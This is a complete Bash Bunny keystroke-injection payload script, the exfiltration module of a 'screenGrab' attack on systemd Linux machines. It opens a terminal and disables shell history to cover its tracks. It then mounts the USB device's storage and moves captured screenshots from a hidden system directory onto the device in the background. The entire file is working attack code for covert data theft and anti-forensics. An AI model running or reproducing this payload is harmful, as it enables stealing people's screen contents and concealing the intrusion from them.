# Title: screenGrab
# Description: screenGrab payload's exfilteration module to move captured snapshots to bunny.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Execution
# Target: GNU/Linux operating systems with systemd.
# Attackmodes: HID, Storage.

LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000

# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200

# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200

# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500

# [transfering payload script]
# create directory named screenGrab in /loot/
Q STRING mv /var/tmp/.system/sysLog/* '$mntt'/loot/screenGrab/ \&
Q ENTER
Q STRING disown \&\& exit
Q ENTER